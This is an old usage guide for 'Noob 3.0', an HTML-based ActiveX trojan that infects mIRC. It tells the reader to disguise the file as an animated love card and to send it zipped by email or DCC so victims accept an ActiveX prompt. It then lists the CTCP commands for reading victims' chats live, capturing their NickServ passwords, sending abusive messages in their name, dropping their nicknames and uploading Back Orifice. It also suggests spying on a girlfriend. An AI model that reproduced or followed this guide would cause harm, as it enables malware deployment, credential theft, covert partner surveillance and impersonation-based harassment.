What is it?
What's so special about it?
- The ability to bypass any type of firewall
(i.e AtGuard, Conceal and Proxy servers & Wingates). I think that
firewalls are the greatest barriers to Trojans. With Noob this problem
is solved! :-)
- The file isn't an executable. It's an HTML based Trojan.
- If you can figure out my spaghetti code, then you can customize the
Trojan because I wrote everything in scripting language so that it
doesn't have to be an *.Exe (Nobody seems to accept Exe files these
days). I'm not selfish but please don't forget to give me credits for
any modifications you make on Noob.
- You can spy on your target's conversation in real time and send
messages to people from his nickname without him/her seeing what
you sent.
- Limited ability to write/read from files using commands such as
'/write' in mIRC.
- It looks like anything except a Trojan. Noob is ideal to send to
your girlfriend, if you think she's not being totally loyal :P,
because it's in the form of a byoootiful lil love animated card. Ain't
that sweet?
What are the main drawbacks? (I do not claim that Noob
is perfect)
- The victim must be using Microsoft Internet Explorer 4.0 SP1
or 5.0
- The user must click on 'yes' when prompted if he/she wishes to allow
ActiveX objects to be accessed by scripts. (but since browsers often
display silly dialogs some people just click on 'yes' without even
reading it. And besides I make it seem that the card uses ActiveX so
that they think it is necessary to enable it)
- By default ActiveX controls are disabled when browsing over Internet
Zones therefore this Trojan cannot be used on a Website. Don't even
think of sending it through HTML-based E-mails like hotmail as an
attachment, unless you zip it first, because when
the target opens the mail it will still be over an internet zone
therefore it won't work.
How should I send it?
- Since Noob was designed for IRC users you could send it through DCC.
- Zip the file first and then send it via E-mail. This forces them to
download it before viewing.
- The above solutions are only proposed scenarios. You can send the
file anyway you wish but just remember that it must be viewed off the
web.
Full Details
The main reason why I made this version of Noob is because it is not affected by the use of Firewalls. Even if the victim uses a firewall to filter incoming and outgoing traffic through his ports, Noob
3.0 will not be affected as it sends and receives through an IRC connection. In addition to this there is no need to use telnet or netcat in this version. All commands can be issued directly from your own mIRC window (see point
6).
With this mail comes an attachment file called "AnimatedCard.htm". This is the Trojan itself. The particularity of this
Trojan is that there is no need for the victim to run an executable (*.exe file) because many people have grown suspicious about them. Instead of that the victim just has to open an HTML file and click "YES" at a not-at-all scary warning dialog.
Here is a scenario:
1. Send it as a mail attachment after having zipped it.
2. Once the victim opens that page he/she will be prompted to Accept Initialization
of an ActiveX Control (this is the sticky part). If the victims clicks on "YES" then he/she will be infected.
* Note once again that this only works on Internet Explorer 4.0 SP1 or 5.0
actually*
3. Assuming that the Victim clicks on "YES", the Trojan will scan his Hard Disk
and search for any mIRC scripts or plain mIRC presence. Once it finds a version of mIRC it infects it with a "script.ini" like
Trojan called Noobini.ini.
4. When your victim connects to IRC all you have to do is type:
/ctcp {your victim's nickname} gravity3
If the victim was successfully infected then you will receive a message from him saying "Noob Active".
5. Now all you have to do is sit and wait to see whatever the victim is typing in his mIRC including his Nickserv or Chanserv
PASSWORDS (on Dalnet) !!! Everything will be sent to you in the query window.
6. You can also issue commands to the mIRC of the victim by simply typing commands in your mIRC window as shown below...
for example you could type:
(a). To see the victim's nick changed to "I-Am-A-Bitch" type:
/ctcp {your victim's nickname} /nick I-Am-A-Bitch
(b). To drop the victim's nickname if he has identified type:
/ctcp {your victim's nickname} /nickserv drop {The victim's current nick}
(c). To make the person banned from a channel try this ;)
/ctcp {your victim's nickname} /msg {#channel name} I think you're all too lame. Fuck you all!
(d). To get an Fserve Running try using the FSERV command... more on that in the mIRC help file. This command can turn out to be useful if you want to download or upload file to the victim such as a
Back Orifice server in the "Startup" folder.
The possibilities to this are only limited to mIRC commands that exist.
It's as if you were in the place of the user.
(e). If you want to say something to a user from the victim's behalf
try this out.
-Let us imagine that your target is called John and he is talking to
someone called Ann and that you want Ann to think that John is really a
piece of shit. Do the following...-
/ctcp John //raw PRIVMSG Ann :Whenever I see you I feel so
horny. I just can't figure out why! How much would you take for a night
bitch?
-Now you can imagine what's going on in Ann's mind but poor John will
probably never understand why Ann thinks he is such a jerk since John
never saw what message you sent Ann from his nickname. :P
7. To stop spying on the victim just type:
/ctcp {your victim's nickname} gone
-------------------------------------------------------------------------------------------------
I explained this in detail in this document but in fact its much easier than it sounds:
1. Send the victim the file
2. Let him/her open it.
3. Connect to their PC and have fun!!
Personal Notes:
- Thanks to KanKan for starting such a wonderful project called the
Trojans Lair (www.tlsecurity.net).
- If you find something that can help enhance Noob please let me know.
I'd really welcome stuff like overflows that could disable the message
or any other miracle of that kind.
- Noob really screwed my life up. I lost my best friend coz of that...
Be careful with it. Spying isn't worth it if the person trusts you.
- I've recently worked on overflows for the most common browsers
and I plan to realease a version soon. The new version will upload and
install a Noob server + a the thing trojan that works on IE 5.0, 5.01,
5.02, 4.01 and possibly another version for use with netscape
browsers. This new version will completely eliminate the user
prompting and will be operational even on 'Internet Zones' i.e. on
websites over the web. Coming soon!
- Sorry for the *1 message that some were receiving in the previous
version of Noob. That was due to a scripting error from me. (I'm such
an idiot sometimes.) This version works just fine on all mIRC
versions. I got hundreds of mails complaining about this. Sorry I
didn't reply to all of them! :P
|